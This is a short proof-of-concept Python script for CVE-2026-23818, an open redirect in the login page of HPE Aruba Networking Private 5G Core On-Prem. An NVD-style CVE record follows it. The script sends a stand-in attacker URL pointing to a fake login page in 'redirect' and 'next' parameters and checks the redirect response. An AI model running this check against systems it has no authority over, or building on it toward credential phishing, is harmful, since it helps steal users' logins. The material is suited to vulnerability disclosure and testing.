CVE-2026-23818

# PoC for CVE-2026-23818 Open Redirect Vulnerability # Target: HPE Aruba Networking Private 5G Core On-Prem import requests def check_open_redirect(target_base_url, malicious_redirect_url): """ Tests if the login endpoint accepts arbitrary redirect URLs. """ # Vulnerable endpoint assumption based on description login_endpoint = f"{target_base_url}/login" # Payload attempting to redirect to an external attacker-controlled server params = { "redirect": malicious_redirect_url, "next": malicious_redirect_url # Common parameter name for redirects } try: print(f"[*] Sending request to: {login_endpoint}") response = requests.get(login_endpoint, params=params, allow_redirects=False) # Check if the response contains a 302/301 Redirect location if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location') if malicious_redirect_url in location: print(f"[!] Vulnerability Confirmed! Redirecting to: {location}") return True print("[*] No open redirect detected or parameter name is different.") return False if __name__ == "__main__": target = "https://<target-ip>:<port>" evil_site = "http://attacker-controlled-server.com/fake-login" check_open_redirect(target, evil_site)

{"cve": {"id": "CVE-2026-23818", "sourceIdentifier": "[email protected]", "published": "2026-04-07T13:16:45.587", "lastModified": "2026-04-14T21:15:02.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in the graphical user interface (GUI) of HPE Aruba Networking Private 5G Core On-Prem that could allow an attacker to abuse an open redirect vulnerability in the login flow using a crafted URL. Successful exploitation may redirect an authenticated user to an attacker-controlled server hosting a spoofed login page prompting the unsuspecting victim to give away their credentials, which could then be captured by the attacker, before being redirected back to the legitimate login page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hpe:aruba_networking_private_5g_core:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.25.3.1", "matchCriteriaId": "B5188B9C-7E4A-456B-A8BF-FC9AFE4AE95F"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05032en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}